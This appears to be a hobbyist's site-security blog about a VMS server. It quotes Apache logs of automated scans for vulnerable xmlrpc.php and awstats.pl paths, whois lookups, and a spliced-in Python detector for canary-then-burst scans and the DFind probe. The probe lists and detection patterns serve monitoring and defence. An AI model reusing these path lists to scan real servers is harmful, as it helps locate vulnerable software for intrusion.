211.174.62.251 - - [18/Jan/2007:12:51:20 +0100] "GET /blogtest/xmlsrv/xmlrpc.php HTTP/1.0" 404 868
211.174.62.251 - - [18/Jan/2007:12:51:21 +0100] "GET /b2/xmlsrv/xmlrpc.php HTTP/1.0" 404 868
211.174.62.251 - - [18/Jan/2007:12:51:22 +0100] "GET /b2evo/xmlsrv/xmlrpc.php HTTP/1.0" 404 868
211.174.62.251 - - [18/Jan/2007:12:51:22 +0100] "GET /wordpress/xmlrpc.php HTTP/1.0" 404 868
211.174.62.251 - - [18/Jan/2007:12:51:23 +0100] "GET /phpgroupware/xmlrpc.php HTTP/1.0" 404 868
211.174.62.251 - - [18/Jan/2007:12:51:23 +0100] "GET /cgi-bin/awstats.pl HTTP/1.0" 404 868
211.174.62.251 - - [18/Jan/2007:12:51:24 +0100] "GET /cgi/awstats.pl HTTP/1.0" 404 868
211.174.62.251 - - [18/Jan/2007:12:51:25 +0100] "GET /scgi-bin/awstats.pl HTTP/1.0" 404 868
211.174.62.251 - - [18/Jan/2007:12:51:25 +0100] "GET /awstats/awstats.pl HTTP/1.0" 404 868
211.174.62.251 - - [18/Jan/2007:12:51:26 +0100] "GET /cgi-bin/awstats/awstats.pl HTTP/1.0" 404 868
211.174.62.251 - - [18/Jan/2007:12:51:27 +0100] "GET /scgi-bin/awstats/awstats.pl HTTP/1.0" 404 868
211.174.62.251 - - [18/Jan/2007:12:51:27 +0100] "GET /cgi/awstats/awstats.pl HTTP/1.0" 404 868
211.174.62.251 - - [18/Jan/2007:12:51:28 +0100] "GET /scgi/awstats/awstats.pl HTTP/1.0" 404 868
211.174.62.251 - - [18/Jan/2007:12:51:28 +0100] "GET /scripts/awstats.pl HTTP/1.0" 404 868
211.174.62.251 - - [18/Jan/2007:12:51:29 +0100] "GET /cgi-bin/stats/awstats.pl HTTP/1.0" 404 868
211.174.62.251 - - [18/Jan/2007:12:51:30 +0100] "GET /scgi-bin/stats/awstats.pl HTTP/1.0" 404 868
211.174.62.251 - - [18/Jan/2007:12:51:30 +0100] "GET /stats/awstats.pl HTTP/1.0" 404 868

Whois says it seems to be Korean; I guess it's spoofed, because there is no WHOIS information at all.
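The bursts in this post and in the one above share a signature worth detecting: one request for a path that cannot exist (nonexistentfile.php, ThisFileMustNotExist, thisdoesnotexistahaha.php), then a rapid list of the same few file names under many directory prefixes (xmlrpc.php, awstats.pl, cmd.php), plus the separate one-line w00tw00t.at.ISC.SANS.DFind probe. The following is an added example of my own, not the blog's code, that groups Apache log lines per client and labels those patterns; the sample lines are constructed after the page's logs with documentation addresses, and the 60-second window and burst size of five are this example's assumptions.

```python
"""Spot scanner fingerprints in Apache log lines: a canary request followed
by a burst of well-known application paths, and the DFind "w00tw00t" probe.

Added example, not the blog's own tooling. The window and burst sizes are
this example's assumptions, not values from the post.
"""
import re
from datetime import datetime

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: (?P<proto>[^"]+))?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
# Scanners first ask for a path that cannot exist, so they can tell a server
# that answers everything with 200 (or 302) from a genuine hit.
CANARY_RE = re.compile(r"nonexist|notexist|doesnotexist|mustnotexist", re.IGNORECASE)
DFIND_MARK = "w00tw00t.at.ISC.SANS.DFind"
WINDOW_S = 60      # assumption: follow-ups within this many seconds of the canary
MIN_BURST = 5      # assumption: at least this many follow-ups make it a scan


def parse(lines):
    """Yield one dict per parseable log line (query string dropped from the path)."""
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            yield {
                "ip": m["ip"],
                "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
                "path": m["target"].split("?", 1)[0],
                "status": int(m["status"]),
            }


def fingerprint(lines):
    """Per client IP: the canary it used, the file names it hunted for, and a label."""
    per_ip = {}
    for req in parse(lines):
        per_ip.setdefault(req["ip"], []).append(req)
    report = {}
    for ip, reqs in per_ip.items():
        reqs.sort(key=lambda r: r["ts"])
        canary = next((r for r in reqs if CANARY_RE.search(r["path"])), None)
        followups = []
        if canary:
            followups = [
                r for r in reqs
                if r is not canary
                and 0 <= (r["ts"] - canary["ts"]).total_seconds() <= WINDOW_S
            ]
        basenames = sorted({r["path"].rsplit("/", 1)[-1] for r in followups})
        if any(DFIND_MARK in r["path"] for r in reqs):
            label = "DFind"
        elif canary and len(followups) >= MIN_BURST:
            label = "web-app scan"
        else:
            label = None
        report[ip] = {
            "requests": len(reqs),
            "canary": canary["path"] if canary else None,
            "canary_status": canary["status"] if canary else None,
            "basenames": basenames,
            "label": label,
        }
    return report


# Constructed sample modelled on the page's logs (documentation IPs).
SAMPLE_LOG = [
    '198.51.100.77 - - [07/Feb/2007:19:16:28 +0100] "GET /thisdoesnotexistahaha.php HTTP/1.1" 302 360',
    '198.51.100.77 - - [07/Feb/2007:19:16:28 +0100] "GET /cmd.php HTTP/1.1" 302 360',
    '198.51.100.77 - - [07/Feb/2007:19:16:29 +0100] "GET /cacti/cmd.php HTTP/1.1" 302 360',
    '198.51.100.77 - - [07/Feb/2007:19:16:29 +0100] "GET /xmlrpc.php HTTP/1.1" 302 360',
    '198.51.100.77 - - [07/Feb/2007:19:16:30 +0100] "GET /blog/xmlrpc.php HTTP/1.1" 302 360',
    '198.51.100.77 - - [07/Feb/2007:19:16:30 +0100] "GET /cgi-bin/awstats.pl HTTP/1.1" 302 360',
    '203.0.113.8 - - [11/Feb/2007:07:25:24 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 893',
    '192.0.2.10 - - [11/Feb/2007:09:00:00 +0100] "GET /index.html HTTP/1.1" 200 5120',
    '192.0.2.10 - - [11/Feb/2007:09:00:03 +0100] "GET /about.html HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for ip, info in fingerprint(SAMPLE_LOG).items():
        print(ip, info["label"], info["canary"], info["basenames"])
```

The canary is there so the scanner can tell what "not found" looks like before it trusts any later answer. In the cmd.php burst of the previous post the server answered 302 to the canary and to every path after it, which tells the scanner only that unknown paths redirect; the xmlrpc.php and awstats.pl lists here all came back 404. Either way nothing was found, and the useful part of the report is the per-source list of file names, which says which software the scanner is hunting for.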
The Forums
have some issues as well. Some people seem to like to add their name, fake IP address and whatever on the site, where it clearly states it's for Dutch VMS users (in Dutch, so what would someone from the US, or Russia, expect?). I had to check the code, because the username that pops up when his credentials are accessed is overwritten by the administrator name. So I decided to remove ALL questionable users and change the administrator password.
Webmail
running on VMS is great: guess a mail with subject "Passionate Kiss" holding an attachment "Greeting Card.exe" (mind the extension…). That is simply shown in the button, so I'm warned beforehand.
Login failures
have been located on 21-Jan-2007, but all on DECnet, and I guess that has to do with the boots last weekend; given the time (around 19:30) quite feasible. And: these can only come from the local network. So I don't mind them, and 22-Jan-2007 is all clear:

================================================================================
23-JAN-2007 00:01:01.96 Login failures found
No login failures found

Script kiddy

It’s been some time, but today there has been a script kiddy busy:

213.186.50.160 - - [15/Jan/2007:17:59:49 +0100] "GET /a1b2c3d4e5f6g7h8i9/nonexistentfile.php HTTP/1.0" 404 864
213.186.50.160 - - [15/Jan/2007:17:59:49 +0100] "GET /adxmlrpc.php HTTP/1.0" 404 864
213.186.50.160 - - [15/Jan/2007:17:59:49 +0100] "GET /adserver/adxmlrpc.php HTTP/1.0" 404 864
213.186.50.160 - - [15/Jan/2007:17:59:49 +0100] "GET /phpAdsNew/adxmlrpc.php HTTP/1.0" 404 864
213.186.50.160 - - [15/Jan/2007:17:59:49 +0100] "GET /phpadsnew/adxmlrpc.php HTTP/1.0" 404 864
213.186.50.160 - - [15/Jan/2007:17:59:49 +0100] "GET /phpads/adxmlrpc.php HTTP/1.0" 404 864
213.186.50.160 - - [15/Jan/2007:17:59:49 +0100] "GET /Ads/adxmlrpc.php HTTP/1.0" 404 864
213.186.50.160 - - [15/Jan/2007:17:59:49 +0100] "GET /ads/adxmlrpc.php HTTP/1.0" 404 864
213.186.50.160 - - [15/Jan/2007:17:59:49 +0100] "GET /xmlrpc.php HTTP/1.0" 404 864
213.186.50.160 - - [15/Jan/2007:17:59:49 +0100] "GET /xmlrpc/xmlrpc.php HTTP/1.0" 404 864
213.186.50.160 - - [15/Jan/2007:17:59:49 +0100] "GET /xmlsrv/xmlrpc.php HTTP/1.0" 404 864
213.186.50.160 - - [15/Jan/2007:17:59:49 +0100] "GET /blog/xmlrpc.php HTTP/1.0" 404 864
213.186.50.160 - - [15/Jan/2007:17:59:50 +0100] "GET /drupal/xmlrpc.php HTTP/1.0" 404 864
213.186.50.160 - - [15/Jan/2007:17:59:50 +0100] "GET /community/xmlrpc.php HTTP/1.0" 404 864
213.186.50.160 - - [15/Jan/2007:17:59:50 +0100] "GET /blogs/xmlrpc.php HTTP/1.0" 404 864
213.186.50.160 - - [15/Jan/2007:17:59:50 +0100] "GET /blogs/xmlsrv/xmlrpc.php HTTP/1.0" 404 864
213.186.50.160 - - [15/Jan/2007:17:59:50 +0100] "GET /blog/xmlsrv/xmlrpc.php HTTP/1.0" 404 864
213.186.50.160 - - [15/Jan/2007:17:59:50 +0100] "GET /blogtest/xmlsrv/xmlrpc.php HTTP/1.0" 404 864
213.186.50.160 - - [15/Jan/2007:17:59:50 +0100] "GET /b2/xmlsrv/xmlrpc.php HTTP/1.0" 404 864
213.186.50.160 - - [15/Jan/2007:17:59:50 +0100] "GET /b2evo/xmlsrv/xmlrpc.php HTTP/1.0" 404 864
213.186.50.160 - - [15/Jan/2007:17:59:50 +0100] "GET /wordpress/xmlrpc.php HTTP/1.0" 404 864
213.186.50.160 - - [15/Jan/2007:17:59:50 +0100] "GET /phpgroupware/xmlrpc.php HTTP/1.0" 404 864

Who is this:

$ whois 213.186.50.160

Whois Server Version 1.3

Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

Server Name: NS1.HEBERGISTE.COM
IP Address: 213.186.50.160
Registrar: OVH
Whois Server: whois.ovh.com
Referral URL: http://www.ovh.com

>>> Last update of whois database: Mon, 15 Jan 2007 07:54:15 EST <<<

$ whois ovh.com

Whois Server Version 1.3

Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

Domain Name: OVH.COM
Registrar: OVH
Whois Server: whois.ovh.com
Referral URL: http://www.ovh.com
Name Server: NS.OVH.NET
Name Server: DNS.OVH.NET
Status: clientTransferProhibited
Status: clientUpdateProhibited
Status: clientDeleteProhibited
Updated Date: 09-feb-2006
Creation Date: 07-feb-1997
Expiration Date: 08-feb-2007

>>> Last update of whois database: Mon, 15 Jan 2007 07:54:15 EST <<<

That's just what VMS's services gave. A web-based service gave this:


inetnum: 213.186.50.128 - 213.186.50.191
netname: BEWEST
descr: BEWEST
country: FR
admin-c: OK217-RIPE
tech-c: OK217-RIPE
status: ASSIGNED PA
mnt-by: OVH-MNT
source: RIPE # Filtered